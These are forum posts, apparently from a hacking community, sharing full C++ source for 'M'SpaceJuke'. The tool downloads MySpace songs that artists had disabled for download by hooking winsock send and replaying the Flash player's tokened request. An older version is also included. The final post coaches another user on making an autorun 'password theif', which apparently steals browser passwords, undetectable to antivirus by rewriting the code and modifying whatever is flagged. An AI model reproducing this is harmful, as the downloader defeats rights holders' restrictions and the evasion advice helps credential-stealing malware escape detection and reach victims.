Steve8x

thanks alot! you helped me figure out how to make it actually work! It does basically the same thing you do with wireshark, except its automated! :) http://hak5.org/forums/index.php?showtopic=9693

Version 2.1 is released. It has been improved and standardized! changelog: M'SpaceJuke v2.1 <> 10-29-08 =========================================== *Split the project up into separate files *Now complies with C++ standards *More compatible (ws2_32.dll is different in XP SP1 & SP2) *More accurate download percentage by calculating it *No longer messes up and freezes/crashes when you type an invalid friendid/url *Made project in MSVC++ 2008 instead of Dev-Cpp! *Uses a different font for edit box, combo box, and buttons... *scanbuffer.dll removed, findstr function made in inline assembly instead. *Reduced file size! OK guys I've been working on this all night and now I'm excited to share it with you! and best of all its OPEN SOURCE! Artist disabled downloading? Well Steve8x RE-enabled it ;) Version 2.1 is here and its now better than ever! It no longer injects code into a web browser in order to function. It works entirely on its own! You can even download multiple songs at once! From multiple artists too simultaneously! I did a little playing around with the flash music players which Myspace has. I discovered how to make the mini flash player load any song I want, by encoding the friendID and songID and placing it in the URL of the mini player! Here's an image of me downloading songs with the latest version 2.1 Here's how it works, You type in an artist URL or FRIEND ID. For the artist URL its not the whole thing. Just whats after "http://myspace.com/" Then click the "Get Songs" button to download the user's myspace page code, which will give the app the friendID. friendID's are needed to get list the songs on the profile. So I made it so you can just type the URL as that's easier to remember and it will grab the friendID for you. If you type the URL/FriendID wrong it no longer crashes, instead it will just popup "Invalid Friend ID" messagebox! Select the song you want to download and click "Download". It will then take the friendID of the user, and the songID of the song you selected and encode them with base64, and sprintf the encoded strings into a mini.swf URL which once loaded will start playing the song you selected for download... Once that is done, It creates a new download window and creates a progress bar + some static text AND an internet explorer control within it. The internet explorer control loads the sprintf formatted mini.swf URL and the flash music player loads and your song starts playing in the download window... I have hooked winsock 'send' in my own app! why? so that when the flash player loads the song and plays it, I copy the packet it sends and then I send it myself :) Since the flash player knows how to get the valid token, The packet is valid! The app then starts receiving the mp3, first the header along with a part of the mp3... The header contains "Content-Length: " which lets me know exactly how big the mp3 file is! That way I can show a percentage and a progress bar, and know when to stop receiving packets! The mp3 files are saved into a folder called "downloads" created in the same directory where you ran M'SpaceJuke 2.1 from... Don't worry if your downloading a song that has the same name as a previous song you've downloaded, it will not overwrite your downloads but instead change the file name like so ... "song.mp3", "song_2.mp3", "song_3.mp3", etc... If you want to download multiple songs, I recommend muting(mute not pause) other ones besides one you want to listen to at that time. Or just mute them all. As I don't think anybody likes to listen to multiple songs all at ONCE! That would give me a headache! Share your thoughts and be a tester! Give me some feedback on how good it works for you and ways I can improve it! SOURCE CODE FOR VERSION 2.1:(MSVC++ 2008 Solution) http://popeax.com/download/apps/M'SpaceJuke-2.1-SRC.zip BINARY FOR VERSION 2.1: http://popeax.com/download/apps/M'SpaceJuke-2.1.zip source code for older version 2.0 (left only for comparison of improvement) [Dev-Cpp Project] http://popeax.com/download/apps/M'SpaceJuke2_SRC.zip [M'SpaceJuke.h] #ifndef MYSPACEJUKE_H #define MYSPACEJUKE_H //includes #include "EasySockets.h" #include "EasyControls.h" #include "StrFunctions.h" #include "BitstreamFont.h" #include "base64.h" #include <stdio.h> #include <time.h> //libs to link with #pragma comment(lib, "ws2_32.lib") #pragma comment(lib, "comctl32.lib") //typedefs typedef BOOL (CALLBACK* InitAtlAxWin)(void); // for loading SWF's in the download windows InitAtlAxWin InitAtl; //prototypes LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam); LRESULT CALLBACK DownloadWndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam); void SendHook(); void SendHook2(DWORD sendbuffer, DWORD buffsize); void HookWinsockSend(); void WorkerThread(); void DownloadThread(); void DownloadMP3(); void InstallFont(); int GetFriendID(); int ListSongs(); //variables FILE* f = 0; char* head = 0; char* postdata = 0; char* recvdata = 0; char* artist = 0; char* songs = 0; char* bsid = 0; char* magicalpacket = 0; HWND hwnd, fID, GS, DB, song, dj, sngz; HWND downloadwindows[32] = {0}; HWND swfplayers[32] = {0}; HWND progbars[32] = {0}; HWND txtz[32] = {0}; int hookenabled = 0, downloads = 0; LRESULT selectedsong; LOGFONT BitStream = {0}; HFONT hFont; #endif Here's the main cpp file's source, just so you can get a glimpse of the code here: [M'SpaceJuke.cpp] //M'SpaceJuke v2.1 - downloads songs from MySpace! //even when the download link has been 'disabled' by the artist //© 2008 Steve8x Inc. //Version 2.1 - 10-29-08 //Made project comply with C++ standards //Also fixed a couple small things #include "M'SpaceJuke.h" const char* host = "mediaservices.myspace.com"; const char* header = "GET /services/media/musicplayerxml.ashx?b=%s"; //friendID will be in place of '%s' const char* footer = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\nAccept: text/html, */*\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Encoding: identity\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nConnection: close\r\n\r\n"; char friendid[200] = {0}; char dbg[200] = {0}; DWORD pSendHook = 0, pSendHook2 = 0, pReturnAddress = 0; EasyControls* ctrl = new EasyControls; int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmd, int nCmdShow) { MSG Msg; WNDCLASSEX wc; ctrl->hInst = hInstance; wc.cbSize = sizeof(WNDCLASSEX); wc.hInstance = hInstance; wc.lpszClassName = L"M'SpaceJuke2_Class"; wc.lpfnWndProc = WndProc; wc.style = CS_DBLCLKS; wc.hIcon = LoadIcon(hInstance, MAKEINTRESOURCE(101)); wc.hIconSm = LoadIcon(hInstance, MAKEINTRESOURCE(101)); wc.hCursor = LoadCursor(0, IDC_ARROW); wc.lpszMenuName = NULL; wc.cbClsExtra = 0; wc.cbWndExtra = 0; wc.hbrBackground = (HBRUSH)GetStockObject(0); RegisterClassEx(&wc); wc.lpszClassName = L"M'SpaceJuke2_Downloader_Class"; wc.lpfnWndProc = DownloadWndProc; RegisterClassEx(&wc); // Initialize common controls library! ctrl->InitCommonCtrls(); // to make sure you can see the controls! //Create the window hwnd = CreateWindowExA(0, "M'SpaceJuke2_Class", "M'SpaceJuke v2.1", WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX | WS_CLIPSIBLINGS, CW_USEDEFAULT, CW_USEDEFAULT, 288, 175, HWND_DESKTOP, 0, hInstance, 0); ctrl->text(hwnd, "FriendID:", 1, 1, 60, 22, 200); fID = ctrl->edit(hwnd, 1, 0, 0, 65, 1, 135, 22, 400); GS = ctrl->button(hwnd, "Get Songs", 202, 1, 80, 22, 420); ctrl->text(hwnd, "Select Song:", 1, 30, 100, 20, 201); song = ctrl->dropdown(hwnd, 0, 1, 50, 200, 200, 300); DB = ctrl->button(hwnd, "Download", 202, 50, 80, 22, 421); dj = ctrl->text(hwnd, "Artist: NULL", 1, 80, 288, 22, 202); sngz = ctrl->text(hwnd, "Songs: 0", 1, 100, 288, 22, 203); ctrl->text(hwnd, "© 2008 Steve8x", 85, 128, 150, 22, 204); InstallFont(); SendMessage(fID, WM_SETFONT, (WPARAM)hFont, 1); SendMessage(song, WM_SETFONT, (WPARAM)hFont, 1); SendMessage(GS, WM_SETFONT, (WPARAM)hFont, 1); SendMessage(DB, WM_SETFONT, (WPARAM)hFont, 1); //Usage of new!! bsid = new char[200]; artist = new char[200]; songs = new char[10000]; recvdata = new char[100000]; magicalpacket = new char[1000]; //Show our window ShowWindow(hwnd, nCmdShow); UpdateWindow(hwnd); InitAtl = (InitAtlAxWin)GetProcAddress(LoadLibraryA("atl"), "AtlAxWinInit"); InitAtl(); //Init winsock 2.2 WSADATA wsaData = {0}; WSAStartup(MAKEWORD(2, 2), &wsaData); HookWinsockSend(); //very important part :) while(GetMessage(&Msg, 0, 0, 0)) { TranslateMessage(&Msg); DispatchMessage(&Msg); } return Msg.wParam; } LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam) { switch (message) { case WM_COMMAND: if(wParam == 420) //Get Songs button pressed { EnableWindow(fID, 0); EnableWindow(GS, 0); hookenabled = 0; //no point having the hook enabled here, since were only getting the songs CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&WorkerThread, 0, 0, 0); } if(wParam == 421) //Download button pressed { hookenabled = 1; //enable hook so we can capture the necessary packet! CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&DownloadThread, 0, 0, 0); } break; case WM_LBUTTONDOWN: //I do this for all my app's I like dragging the window from anywhere SendMessage(hWnd, WM_NCLBUTTONDOWN, HTCAPTION, lParam); break; case WM_CTLCOLORSTATIC: SetBkMode((HDC)wParam, TRANSPARENT); return (LRESULT)GetStockObject(WHITE_BRUSH); break; case WM_CLOSE: delete[] ctrl; delete[] bsid; delete[] artist; delete[] songs; delete[] recvdata; delete[] magicalpacket; WSACleanup(); PostQuitMessage(0); break; default: return DefWindowProc (hWnd, message, wParam, lParam); } return 0; } LRESULT CALLBACK DownloadWndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam) { switch (message) { case WM_LBUTTONDOWN: SendMessage(hWnd, WM_NCLBUTTONDOWN, HTCAPTION, lParam); break; case WM_CTLCOLORSTATIC: SetBkMode((HDC)wParam, TRANSPARENT); return (LRESULT)GetStockObject(WHITE_BRUSH); break; case WM_CLOSE: //Closing a download window does not stop the download DestroyWindow(hWnd); break; default: return DefWindowProc (hWnd, message, wParam, lParam); } return 0; } //Now lets get down to the nuts and bolts! :P void _declspec(naked) SendHook() { _asm { push ebp //required mov ebp, esp //required sub esp, 0x10 //required push [ebp+0x10] //push size of send buffer into stack(as param) push [ebp+0x0C] //push pointer to send buffer into stack(as param) call dword ptr [pSendHook2] //call my C++ function jmp dword ptr [pReturnAddress] //jump back to WS2_32 'send' + 6 } } void SendHook2(DWORD sendbuffer, DWORD buffsize) { if(hookenabled == 1) { DWORD pToken = findstr((char*)sendbuffer, buffsize, "token=", 0); if(pToken != -1) { // 'token' was found in buffer so we found the right packet :) ZeroMemory(magicalpacket, 1000); memcpy(magicalpacket, (void*)sendbuffer, buffsize); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&DownloadMP3, 0, 0, 0); } } } //Hook Winsock In My Own APP. So I Can Intercept The Magical Packet //Which Will Allow Me To Download The MP3 Thats Playing In The Flash Player! void HookWinsockSend() { char* hookaddress = 0; //Set up for winsock 'send' hook DWORD sendaddress = (DWORD)GetProcAddress(GetModuleHandleA("ws2_32.dll"), "send"); if(sendaddress == 0) sendaddress = (DWORD)&send; pSendHook = (DWORD)&SendHook; pSendHook2 = (DWORD)&SendHook2; //XP Service Pack 2 version of ws2_32.dll if(*(WORD*)sendaddress == 0xFF8B) // mov edi, edi (basically a two byte nop) { OutputDebugStringA("[myspacejuke] (XP-SP2) send bytes = {0x8B, 0xFF}"); pReturnAddress = sendaddress + 8; hookaddress = (char*)sendaddress + 2; } //XP Service Pack 1 version of ws2_32.dll else if(*(WORD*)sendaddress == 0x8B55) //push ebp + 1 byte of next instruction { OutputDebugStringA("[myspacejuke] (XP-SP1) send bytes = {0x55, 0x8B}"); pReturnAddress = sendaddress + 6; hookaddress = (char*)sendaddress; } else //Should never happen! but you never know! { char cdate[9] = {0}; char ctime[9] = {0}; _strdate(cdate); _strtime(ctime); f = fopen("errorlog.txt", "wb"); sprintf(dbg, "%s %s\r\n\r\nWinsock Hook Failed!\r\nFirst 20 Bytes Of Send:\r\n", cdate, ctime); fwrite(dbg, strlen(dbg), 1, f); hookaddress = (char*)sendaddress; BYTE temp = 0; for(int i = 0; i < 20; i++) { temp = *(BYTE*)&hookaddress[i]; sprintf(dbg, "\r\n[%i]: 0x%X", i, temp); fwrite(dbg, strlen(dbg), 1, f); } fclose(f); MessageBoxA(0, "Failed to hook winsock \"send\" \nEmail me the \"errorlog.txt\" so I can fix it!\nAlso state which version of windows you have + service packs\n\nSteve8x@live.com", "Winsock Hook Failed!", 0); ExitProcess(0); } //unprotect the right 6 bytes of the beginning of 'send' for the hook DWORD oldprotect = 0; VirtualProtect(hookaddress, 6, PAGE_EXECUTE_READWRITE, &oldprotect); //replace start of winsock 'send' with (JMP DWORD PTR [pointertosendhook]) *(WORD*)hookaddress = 0x25FF; *(DWORD*)&hookaddress[2] = (DWORD)&pSendHook; // winsock 'send' is now hooked :) } void WorkerThread() { xClient* cli = new xClient; head = new char[1000]; postdata = new char[10000]; ZeroMemory(friendid, 200); ZeroMemory(head, 1000); ZeroMemory(postdata, 10000); ZeroMemory(recvdata, 10000); GetWindowTextA(fID, friendid, 200); sprintf(postdata, "GET /%s HTTP/1.1\r\nHost: www.myspace.com\r\n%s", friendid, footer); //connect to server using my class;) cli->ConnectToServer("myspace.com", 80); sendx(cli->serversock, postdata, strlen(postdata)); recvx(cli->serversock, recvdata, 10000); cli->Close(); if(GetFriendID() == 0) { EnableWindow(fID, 1); EnableWindow(GS, 1); MessageBoxA(0, "Invalid Friend ID!", "ERROR!", MB_ICONEXCLAMATION); goto cleanup; } sprintf(head, header, friendid); sprintf(postdata, "%s HTTP/1.1\r\nAccept: */*\r\nConnection: close\r\nHost: %s\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n\r\n", head, host); ZeroMemory(recvdata, 10000); cli->ConnectToServer((char*)host, 80); sendx(cli->serversock, postdata, strlen(postdata)); recvx(cli->serversock, recvdata, 10000); cli->Close(); int numsongs = ListSongs(); sprintf(dbg, "Songs: %i", numsongs); SetWindowTextA(sngz, dbg); EnableWindow(fID, 1); EnableWindow(GS, 1); cleanup: delete cli; delete[] head; delete[] postdata; ExitThread(0); } int GetFriendID() { char* bandid = recvdata; DWORD pInvalid = findstr(recvdata, strlen(recvdata), "Invalid Friend ID", 0); if(pInvalid != -1) return 0; DWORD pFriendID = findstr(recvdata, strlen(recvdata), "DisplayFriendId\":", 1); if(pFriendID == -1) return 0; bandid = ((char*)pFriendID + 17); int stringsize = GetStrSize(bandid, ',', 0); ZeroMemory(friendid, 200); memcpy(friendid, bandid, stringsize); return 1; } int ListSongs() //scans through XML file in buffer and puts the songs into the listbox { DWORD i = 0; int numsongs = 0; char* title = recvdata; ZeroMemory(artist, 200); ZeroMemory(songs, 10000); SendMessage(song, CB_RESETCONTENT, 0, 0); // clears the list box DWORD pName = findstr(title, strlen(title), "<name>", 0); if(pName == -1) // -1 means string was not found should not happen return 0; title = ((char*)pName + 15); int stringsize = GetStrSize(title, ']', 0); memcpy(artist, title, stringsize); if(strcmp("This artist does not exist", artist) == 0) { return 0; } sprintf(dbg, "Artist: %s", artist); SetWindowTextA(dj, dbg); nextsong: while(cmp(title, "title=\"", 7) == 0) // locate song title { if(cmp(title, "</playlist>", 11) == 1) { //end of songs in xml file reached SendMessage(song, CB_SHOWDROPDOWN, 1, 0); return numsongs; } title++; } title += 7; // get past 'title="' stringsize = GetStrSize(title, 0x22, 0); //copy song name into string array memcpy(&songs[i], title, stringsize); //Add song name to list box SendMessageA(song, CB_ADDSTRING, 0, (LPARAM)&songs[i]); i += (stringsize + 1); //calculate next string offset numsongs++; goto nextsong; } void DownloadThread() { char* swfurl = new char[1000]; char* songurl = recvdata; int stringsize = 0; selectedsong = SendMessage(song, CB_GETCURSEL, 0, 0); int selected = selectedsong + 1; while(selected != 0) // locate bsid/songid of song selected and store it { ZeroMemory(bsid, 200); while(cmp(songurl, "bsid=\"", 6) == 0) { songurl++; } songurl += 6; stringsize = GetStrSize(songurl, 0x22, 0); memcpy(bsid, songurl, stringsize); songurl++; selected--; } //encode songid/bsid, friendid/bandid, and autoplay boolean for URL to be valid std::string song = base64_encode((const unsigned char*)bsid, strlen(bsid)); std::string band = base64_encode((const unsigned char*)friendid, strlen(friendid)); std::string unknown = "MTIyMTA0Njk5NQ=="; std::string AutoPlay = base64_encode((const unsigned char*)"True", 4); //then we can have the mini flash player load any song we want :) ZeroMemory(swfurl, 1000); sprintf(swfurl, "http://lads.myspace.com/mini/mini.swf?b=%s&o=%s&d=%s&i=%s&a=%s&u=%s", song.c_str(), band.c_str(), unknown.c_str(), band.c_str(), AutoPlay.c_str(), band.c_str()); downloadwindows[downloads] = CreateWindowExA(0, "M'SpaceJuke2_Downloader_Class", "Downloading...", WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX | WS_CLIPSIBLINGS, CW_USEDEFAULT, CW_USEDEFAULT, 303, 150, HWND_DESKTOP, 0, ctrl->hInst, 0); CreateWindowExA(0, "AtlAxWin", swfurl, WS_VISIBLE | WS_CHILD, 1, 1, 300, 55, downloadwindows[downloads], 0, ctrl->hInst, 0); progbars[downloads] = ctrl->progbar(downloadwindows[downloads], 1, 60, 294, 15, 0); txtz[downloads] = ctrl->text(downloadwindows[downloads], "Loading...", 1, 80, 300, 22, 0); ShowWindow(downloadwindows[downloads], 1); UpdateWindow(downloadwindows[downloads]); downloads++; MSG Msg; while(GetMessage(&Msg, 0, 0, 0)) { TranslateMessage(&Msg); DispatchMessage(&Msg); } delete[] swfurl; ExitThread(0); } void DownloadMP3() { xClient* cli = new xClient; char* mp3bytes = new char[1048576]; // allocate 1MB buffer to recv mp3 in... char* songpath = new char[1000]; char* host = new char[100]; char* contentlength = new char[100]; int selected = selectedsong; int d_id = downloads - 1; char* songName = songs; while(selected != 0) { int strsize = strlen(songName) + 1; songName += strsize; selected--; } ZeroMemory(songpath, 1000); CreateDirectoryA("downloads", 0); sprintf(songpath, "downloads\\%s.mp3", songName); //check if file exists first, and if so change the name a little so we dont overwrite the existing song int songNum = 2; checkagain: f = fopen(songpath, "rb"); if(f) { fclose(f); sprintf(songpath, "downloads\\%s_%i.mp3", songName, songNum); songNum++; goto checkagain; } SetWindowTextA(txtz[d_id], songpath); ZeroMemory(host, 100); DWORD pHost = findstr(magicalpacket, strlen(magicalpacket), "Host: ", 1); char* findhost = ((char*)pHost + 6); int strsize = GetStrSize(findhost, 0, 1); memcpy(host, findhost, strsize); //heres where the fun part begins! ZeroMemory(mp3bytes, 1048576); cli->ConnectToServer(host, 80); hookenabled = 0; // disable hook so we don't end up in a indefinite loop :) sendx(cli->serversock, magicalpacket, strlen(magicalpacket)); hookenabled = 1; // we can re-enable after we send the packet! recvx(cli->serversock, mp3bytes, 1000); // recv part of the mp3 + header containing 'Content-Length' which is the size of the mp3 ZeroMemory(contentlength, 100); DWORD pContentLen = findstr(mp3bytes, strlen(mp3bytes), "Content-Length: ", 1); char* contentlen = ((char*)pContentLen + 16); strsize = GetStrSize(contentlen, 0, 1); memcpy(contentlength, contentlen, strsize); unsigned long ContentLen = atoi(contentlength); // convert string to number sprintf(dbg, "Mp3 File Size = %u bytes", ContentLen); OutputDebugStringA(dbg); char* mp3head = mp3bytes; while(*(DWORD*)mp3head != 0x0A0D0A0D) // \r\n\r\n { mp3head++; } mp3head += 4; DWORD mp3headsize = 0; char* endofmp3head = mp3head; while(*(DWORD*)endofmp3head != 0) { mp3headsize++; endofmp3head++; } DWORD byteswritten = 0; HANDLE hMP3 = CreateFileA(songpath, GENERIC_WRITE, FILE_SHARE_READ, 0, CREATE_ALWAYS, 0, 0); WriteFile(hMP3, mp3head, mp3headsize, &byteswritten, 0); unsigned long ContentLenDownloaded = byteswritten; DWORD blocksize = ContentLen / 66; float percentage = ((float)ContentLenDownloaded / (float)ContentLen) * 100.0f; SendMessage(progbars[d_id], PBM_SETPOS, (int)percentage, 0); DWORD bytesleft = 0; //RECIEVING MP3 AND WRITING TO FILE! YAY :) while(ContentLenDownloaded < ContentLen) { bytesleft = ContentLen - ContentLenDownloaded; ZeroMemory(mp3bytes, 1048576); sendx(cli->serversock, "!", 1); //keep-alive (i think) if(bytesleft < blocksize) { recvx(cli->serversock, mp3bytes, bytesleft); WriteFile(hMP3, mp3bytes, bytesleft, &byteswritten, 0); } else { recvx(cli->serversock, mp3bytes, blocksize); WriteFile(hMP3, mp3bytes, blocksize, &byteswritten, 0); } ContentLenDownloaded += byteswritten; percentage = ((float)ContentLenDownloaded / (float)ContentLen) * 100.0f; SendMessage(progbars[d_id], PBM_SETPOS, (int)percentage, 0); sprintf(dbg, "Downloading... [%.2f%% Done!]", percentage); SetWindowTextA(downloadwindows[d_id], dbg); //sprintf(dbg, "downloaded = %u, total = %u, bytesleft = %u", ContentLenDownloaded, ContentLen, bytesleft); //OutputDebugString(dbg); } CloseHandle(hMP3); cli->Close(); SetWindowTextA(downloadwindows[d_id], "Downloading... [100% Done!]"); SendMessage(progbars[d_id], PBM_SETPOS, 100, 0); delete cli; delete[] mp3bytes; delete[] songpath; delete[] host; delete[] contentlength; //keep arrays packed downloadwindows[d_id] = downloadwindows[downloads-1]; progbars[d_id] = progbars[downloads-1]; txtz[d_id] = txtz[downloads-1]; downloads--; ExitThread(0); } void InstallFont() { char WinDir[260] = {0}; char Slash[2] = "\\"; char Fontz[] = "Fonts\\VeraMono.ttf"; GetSystemDirectoryA(WinDir, 260); for(int i = 3; i < sizeof(WinDir); i++) { if(WinDir[i] == Slash[0]) { for(int z = 0; z < sizeof(Fontz); z++) { i++; WinDir[i] = Fontz[z]; } break; } } f = fopen(WinDir, "rb"); if(f) { fclose(f); OutputDebugStringA("Bitstream Font Is Already Installed!"); } else { f = fopen(WinDir, "wb"); fwrite(&BitstreamFont, sizeof(BitstreamFont), 1, f); fclose(f); AddFontResourceA("VeraMono.ttf"); OutputDebugStringA("Bitstream Font Was Installed Successfully!"); } BitStream.lfHeight = 14; BitStream.lfWeight = 420; wcscpy(BitStream.lfFaceName, L"Bitstream Vera Sans Mono"); hFont = CreateFontIndirect(&BitStream); }

@Mr Funk great to see you solved your problem! @digip Does that still work? getting the URL to the song on myspace and downloading it? I thought you USED to be able to do that but they changed it so you can't anymore... By randomly changing the name of the mp3 file stored on the server. I used to do it to but you only had like a 10 second window to be downloading the file, if you were too slow then the file would already have its name changed and you'd get a file not found error... I'm guessing you haven't tried this recently? To prove you wrong I created a sample program! it sends a packet to mediaservices.myspace.com with a friendID to get the xml file which holds the song playlist info, which has fields specifying the url of the song to download... it seems as if the url always gives a 404 error, not even allowing that 10 second window anymore! :( its a DevCPP project. Specify a friend ID and click "Get Songs" it will display the songs the music myspace page has in the list box. Then select a song and click download and it will find which url is for the selected song and load the url into your default web browser for download... sad thing is, you get a 404: file not found error no matter how fast you click download !!! So if I'm doing it wrong please let me know how I can fix my program to be able to get it to work, try it with your wireshark again and let me know your results... else I'll have to figure out how to convert an RMTP stream into a mp3 file... project files: http://popeax.com/myspacejuke.zip source: //Myspace Juke v1.0 - downloads songs from myspace //even when the download link is not available //by Steve8x #include <winsock2.h> #include <windows.h> #include <stdio.h> #include "EasyControls.h" #include "EasySockets.h" // Simple Winsock Classes char* HOST = "mediaservices.myspace.com"; char* HEADER = "GET /services/media/musicplayerxml.ashx?b=%s"; //friendID will be in place of '%s' void WorkerThread(void); void DownloadThread(void); int ListSongs(void); int cmp(char*, char*, int); char* head = 0; char* postdata = 0; char* recvdata = 0; char* songs = 0; char dbg[200]; int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmd, int nCmdShow) { MSG Msg; WNDCLASSEX wc; hInst = hInstance; wc.cbSize = sizeof(WNDCLASSEX); wc.hInstance = hInstance; wc.lpszClassName = "MyspaceJuke_Class"; wc.lpfnWndProc = WndProc; wc.style = CS_DBLCLKS; wc.hIcon = LoadIcon(hInst, MAKEINTRESOURCE(101)); wc.hIconSm = LoadIcon(hInst, MAKEINTRESOURCE(101)); wc.hCursor = LoadCursor(0, IDC_ARROW); wc.lpszMenuName = NULL; wc.cbClsExtra = 0; wc.cbWndExtra = 0; wc.hbrBackground = (HBRUSH)GetStockObject(0); RegisterClassEx(&wc); // Initialize common controls library! InitCommonCtrls(); // to make sure you can see the controls! //Create the window hwnd = CreateWindowEx(0, "MyspaceJuke_Class", "MyspaceJuke", WS_OVERLAPPED|WS_CAPTION|WS_SYSMENU|WS_MINIMIZEBOX|WS_CLIPSIBLINGS, CW_USEDEFAULT, CW_USEDEFAULT, 290, 150, HWND_DESKTOP, 0, hInstance, 0); CreateTextEx(hwnd, "FriendID:", 1, 1, 60, 22, 200); fID = CreateEditEx(hwnd, 0, 0, 0, 65, 1, 135, 22, 400); CreateButtonEx(hwnd, "Get Songs", 202, 1, 80, 22, 420); CreateTextEx(hwnd, "Select Song:", 1, 30, 100, 20, 201); song = CreateDropDownEx(hwnd, 0, 1, 50, 200, 100, 300); CreateButtonEx(hwnd, "Download", 202, 50, 80, 22, 421); CreateTextEx(hwnd, "© 2008 Steve8x", 85, 90, 150, 22, 202); songs = (char*)malloc(5000); recvdata = (char*)malloc(100000); //Show our window ShowWindow(hwnd, nCmdShow); UpdateWindow(hwnd); //Init winsock 2.2 WSADATA wsaData = {0}; WSAStartup(MAKEWORD(2, 2), &wsaData); while(GetMessage(&Msg, 0, 0, 0)) { TranslateMessage(&Msg); DispatchMessage(&Msg); } return Msg.wParam; } LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam) { switch (message) { case WM_COMMAND: if(wParam == 420) //Get Songs button pressed { CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&WorkerThread, 0, 0, 0); } if(wParam == 421) //Download button pressed { CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&DownloadThread, 0, 0, 0); } break; case WM_LBUTTONDOWN: //I do this for all my app's I like dragging the window from anywhere SendMessage(hWnd, WM_NCLBUTTONDOWN, HTCAPTION, lParam); break; case WM_CTLCOLORSTATIC: SetBkMode((HDC)wParam, TRANSPARENT); return (LRESULT)GetStockObject(WHITE_BRUSH); break; case WM_CLOSE: free(recvdata); free(songs); WSACleanup(); PostQuitMessage(0); break; default: return DefWindowProc (hWnd, message, wParam, lParam); } return 0; } void WorkerThread() { xClient* cli = new xClient; head = (char*)malloc(1000); postdata = (char*)malloc(10000); //malloc does not init memory to zero ZeroMemory(head, 1000); ZeroMemory(postdata, 10000); ZeroMemory(recvdata, 100000); GetWindowTextA(fID, dbg, 101); sprintf(head, HEADER, dbg); sprintf(postdata, "%s HTTP/1.1\r\nAccept: */*\r\nConnection: close\r\nHost: %s\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n\r\n", head, HOST); cli->ConnectToServer(HOST, 80); sendx(cli->serversock, postdata, strlen(postdata)); recvx(cli->serversock, recvdata, 100000); cli->Close(); OutputDebugString(recvdata); int numsongs = ListSongs(); sprintf(dbg, "number of songs = %i", numsongs); OutputDebugString(dbg); SendMessage(song, CB_SETCURSEL, 0, 0); //Clean up delete cli; free(head); free(postdata); ExitThread(0); } int ListSongs() // i changed to using the cmp function i created so i could compare more than 32 bits at a time { int numsongs = 0; DWORD i = 0; char* songname = (char*)malloc(200); char* title = recvdata; ZeroMemory(songname, 200); ZeroMemory(songs, 5000); SendMessage(song, CB_RESETCONTENT, 0, 0); // clears the list box nextsong: //while(*(DWORD*)title != 0x6C746974) // 'titl' while(cmp(title, "title=\"", 7) == 0) // locate song title { //if(*(DWORD*)titl == 0x72702F3C) // '</pr' if(cmp(title, "</playlist>", 11) == 1) { //end of songs in xml file reached SendMessage(song, CB_SHOWDROPDOWN, 1, 0); free(songname); return numsongs; } title++; } title += 7; // get past 'title="' int stringsize = 0; char* endofstring = title; //get string size by counting the characters until the next double quote while(*(BYTE*)endofstring != 0x22) // '"' { endofstring++; stringsize++; } //copy song name into string array memcpy(songname, title, stringsize); strcpy(&songs[i], songname); //zero 'songname' temporary buffer in prep for next song ZeroMemory(songname, 200); SendMessage(song, CB_ADDSTRING, 0, (LPARAM)&songs[i]); i += (stringsize + 1); //calculate next string offset numsongs++; goto nextsong; } void DownloadThread() { char* downloadurl = (char*)malloc(1000); char* songurl = recvdata; LRESULT selectedsong; ZeroMemory(downloadurl, 1000); selectedsong = SendMessage(song, CB_GETCURSEL, 0, 0); selectedsong += 1; while(selectedsong != 0) // locate url of song selected { //while(*(DWORD*)songurl != 0x6C727564) // 'durl' while(cmp(songurl, "durl=\"", 6) == 0) { songurl++; } songurl++; selectedsong--; } songurl += 5; // get past 'url="' int urlsize = 0; char* endofstring = songurl; while(*(BYTE*)endofstring != 0x22) // '"' { endofstring++; urlsize++; } memcpy(downloadurl, songurl, urlsize); //download the file in your default web browser ShellExecute(0, "open", downloadurl, 0, 0, SW_SHOWNORMAL); free(downloadurl); } int cmp(char* str1, char* str2, int strsize) // compare non null terminated strings by specifying size { for(int i = 0; i < strsize; i++) { //if(*(BYTE*)&str1[i] != *(BYTE*)&str2[i]) // == same as line below if(str1[i] != str2[i]) { //strings not equal return 0; } } //strings are equal return 1; }

hiding the autorun.inf wont change anything... Get rid of the autorun.inf, and youll still be detected... it isn't the autorun.inf that is detected! it is the program your executing with it! nircmd? I'm not sure what that is but I don't think you coded it... As i've heard someone else talk about it before you... What you need to do is actually write your own source code. Then you shouldn't be detected, even if you are you can then modify the source easily and make it undetectable... what does this "password theif" actually do? take passwords from firefox + IE?(thats my guess) replicate what it does with code in a new project. Is this program packed? If not you can easily dissemble it and see the functions + API's it calls you shouldn't be using nircmd at all, it should say shellexecute=myprogram.exe Without source code your screwed. You need it to be able easily take code out(commenting code) and recompile it into a new exe. That's what helps you in determining what is detected and what is not. Code that is detected must be modified! Code that is not can be left alone.

